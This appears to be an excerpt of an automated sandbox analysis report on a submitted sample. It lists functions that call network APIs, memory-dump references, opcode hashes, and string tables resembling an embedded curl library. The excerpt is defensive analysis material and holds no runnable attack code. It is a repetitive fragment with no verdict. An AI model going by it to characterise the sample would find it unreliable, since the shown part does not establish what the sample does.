                                                    • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: gethostname
                                                    • String ID:
                                                    • API String ID: 144339138-0
                                                    • Opcode ID: 0b260848586561708039bbad634ff45e1a87846980c36966c5b3167aa1eeae8c
                                                    • Instruction ID: 2f47a9cc86dfdf3397ef29b17b635c22625677199c902d1ab2fe609266aa334b
                                                    • Opcode Fuzzy Hash: 0b260848586561708039bbad634ff45e1a87846980c36966c5b3167aa1eeae8c
                                                    • Instruction Fuzzy Hash: AC51D1F06047019BEB309B25DF4976376E4AF5131DF54283DEA8AA66D1EB74E8C4CB02
                                                    Function 00E1AF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • getsockname.WS2_32(?,?,00000080), ref: 00E1AFD1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: getsockname
                                                    • String ID:
                                                    • API String ID: 3358416759-0
                                                    • Opcode ID: 44385031b230b450108acbaf65b4983373beb7110e7b9c381b66af96beee1f08
                                                    • Instruction ID: b1a0d36672dc9159b3e21a8fa1dacf261c579f22035d464169ec943e8b47abf1
                                                    • Opcode Fuzzy Hash: 44385031b230b450108acbaf65b4983373beb7110e7b9c381b66af96beee1f08
                                                    • Instruction Fuzzy Hash: 49119670908785D5EB268F18D4027F6B3F4EFD4329F109618E59952150F7329AC68BC2
                                                    Function 00E1A920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • send.WS2_32(?,?,?,00000000,00000000,?), ref: 00E1A97E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: send
                                                    • String ID:
                                                    • API String ID: 2809346765-0
                                                    • Opcode ID: b63c166cf1d31c9b11350e2cd4cb555feed2cb10e8b6f05e457050c954cb13f7
                                                    • Instruction ID: aa8f6b750bcd1bf4b23d0d66704fabbc0b56157b14391ea5f8e73c0e634372b8
                                                    • Opcode Fuzzy Hash: b63c166cf1d31c9b11350e2cd4cb555feed2cb10e8b6f05e457050c954cb13f7
                                                    • Instruction Fuzzy Hash: E501A7717017109FC6148F15DC45BAAB7A5EFC4720F0A8569E9982B361C331AC518BD1
                                                    Function 00E1AF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • socket.WS2_32(?,00E1B280,00000000,-00000001,00000000,00E1B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 00E1AF67
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: socket
                                                    • String ID:
                                                    • API String ID: 98920635-0
                                                    • Opcode ID: f2bb0e0553ae29237eed697e2dfeb62b73c9673a602c52de028a3554bef26ded
                                                    • Instruction ID: d25cc84f65ecb00f7e9507187f1814ac27d267d7b34dde1ab30ed4623f9e1b7b
                                                    • Opcode Fuzzy Hash: f2bb0e0553ae29237eed697e2dfeb62b73c9673a602c52de028a3554bef26ded
                                                    • Instruction Fuzzy Hash: 7EE0EDB6A092216BD654DA18E8449ABF369EFC8B20F055A59B86467204C330AC918BE2
                                                    Function 00E1B020 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • closesocket.WS2_32(?,00E19422,?,?,?,?,?,?,?,?,?,?,?,w3,01241600,00000000), ref: 00E1B04D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: closesocket
                                                    • String ID:
                                                    • API String ID: 2781271927-0
                                                    • Opcode ID: f2f4eb3f664015cd3f2f270ab39083a38f9b4af85d36d1ee82d4220a6addc2b9
                                                    • Instruction ID: e3b935a1b1c3a71e899561903d5dddfedeaa122c31d8dc21b85a6c23f44bf11d
                                                    • Opcode Fuzzy Hash: f2f4eb3f664015cd3f2f270ab39083a38f9b4af85d36d1ee82d4220a6addc2b9
                                                    • Instruction Fuzzy Hash: A4D0C23430020197CA208A14C884A97722B7FC8314FA8DB68E02C8A150C73BCC838601
                                                    Function 00DB67E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ioctlsocket.WS2_32(?,8004667E,?,?,00D8AF56,?,00000001), ref: 00DB67FC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: ioctlsocket
                                                    • String ID:
                                                    • API String ID: 3577187118-0
                                                    • Opcode ID: 03acd2284b38e07e758f7ff7c5ff990d0e05f9703754bb4932fdbf2e60f45488
                                                    • Instruction ID: 51c6bd8fe0380b492677a0af7bca241a7374fac25c3ee312101794ca8da7ecb7
                                                    • Opcode Fuzzy Hash: 03acd2284b38e07e758f7ff7c5ff990d0e05f9703754bb4932fdbf2e60f45488
                                                    • Instruction Fuzzy Hash: 26C012F1118101EFC60C8714D895A6F76D9DB85355F01582CB04681180EA305990CA16
                                                    Function 00D531D7 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 83797449e460b270d351d8a51689483d9d7eea5a97ee0e9db3b42bb0de5e9859
                                                    • Instruction ID: 23a9c25c80b5818aa4261e82057fdedcd0cdb5fd567e7fd4af2ef3c55e9396f0
                                                    • Opcode Fuzzy Hash: 83797449e460b270d351d8a51689483d9d7eea5a97ee0e9db3b42bb0de5e9859
                                                    • Instruction Fuzzy Hash: 853192B49197059BCB00EFB8D5846AEBBF4BF54345F00896DE898E7340E6349A48CF52
                                                    Function 010DB180 Relevance: 1.3, APIs: 1, Instructions: 9sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: f2f774c1e603b8d2c94598f02fd33f9cf9df019256a385d1dcddee70a9c051c0
                                                    • Instruction ID: 46936bc3bb97bca1d0bd04baaeb745ce87d5a219e2253e8956f63442da9e3173
                                                    • Opcode Fuzzy Hash: f2f774c1e603b8d2c94598f02fd33f9cf9df019256a385d1dcddee70a9c051c0
                                                    • Instruction Fuzzy Hash: 8FC04CE0C1474446D740BA38858615E7AE47781104FC11E69998496195F668D7188667

                                                    Non-executed Functions

                                                    Function 00D91BE0 Relevance: 33.9, Strings: 26, Instructions: 1418COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                                    • API String ID: 0-1371176463
                                                    • Opcode ID: 9536737d79691d12835883182f463e4bda9e5397d5345837f83b4147d8daa42f
                                                    • Instruction ID: f6b372eab4f781d7b4260bda25e59fd419a6de42abacd5b949b244b3c43bd78e
                                                    • Opcode Fuzzy Hash: 9536737d79691d12835883182f463e4bda9e5397d5345837f83b4147d8daa42f
                                                    • Instruction Fuzzy Hash: EEB21675A08341BBEF24AE65DC46B76BBE4AF55704F08452CEC8997282F771EC048772
                                                    Function 00D64940 Relevance: 17.0, Strings: 13, Instructions: 731COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                                    • API String ID: 0-122532811
                                                    • Opcode ID: 862d377f4d0b14b04c34d2f03a53fce113d027a4b0ea1ebe365aa0eca6f8970b
                                                    • Instruction ID: b4aae6d3804633651e0f396ae3167bee3c458a306b8b3a4eeb0e3a3b2e6c51b5
                                                    • Opcode Fuzzy Hash: 862d377f4d0b14b04c34d2f03a53fce113d027a4b0ea1ebe365aa0eca6f8970b
                                                    • Instruction Fuzzy Hash: 9C42D771B08701AFD718DE28CC81B6BB6E6EFC4704F048A2CF59997391D775E8548BA2
                                                    Function 00E09880 Relevance: 15.2, Strings: 12, Instructions: 226COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: -vc$ans$ate$attempts$ndot$out$retr$retr$rota$time$use-$usev
                                                    • API String ID: 0-1574211403
                                                    • Opcode ID: 3a5c1466fdee0ee7ceb0622bc67749f864e33bbe7e5b768770ef0d7ee4195f0e
                                                    • Instruction ID: b3ce1bc59d91877af81c402d767ad3b830e560aea9ae63e54551a16d9dec6202
                                                    • Opcode Fuzzy Hash: 3a5c1466fdee0ee7ceb0622bc67749f864e33bbe7e5b768770ef0d7ee4195f0e
                                                    • Instruction Fuzzy Hash: E161FDB5A0830067E714AA20AC52B7BB2D99BD5318F44A43DFC4AB63D3FA71DD84C653
                                                    Function 00D74F70 Relevance: 12.2, Strings: 9, Instructions: 911COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
